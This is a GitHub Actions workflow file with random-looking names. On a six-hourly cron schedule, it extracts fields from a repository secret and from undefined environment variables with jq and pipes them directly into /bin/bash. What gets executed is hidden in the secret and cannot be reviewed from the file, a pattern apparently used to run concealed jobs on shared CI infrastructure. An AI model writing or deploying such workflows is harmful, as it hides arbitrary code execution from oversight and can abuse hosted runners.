name: chenjiumu6718

on:
  workflow_dispatch:
  schedule:
    - cron: '20 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chenjiumu6718
        env:
          n9: ${{ secrets.n9 }}
        run: |
          echo $n9 | jq -r .g6 | /bin/bash
          echo $ez368 | jq -r .dhbgw4 | /bin/bash
          echo $rn0131 | jq -r .n6 | /bin/bash

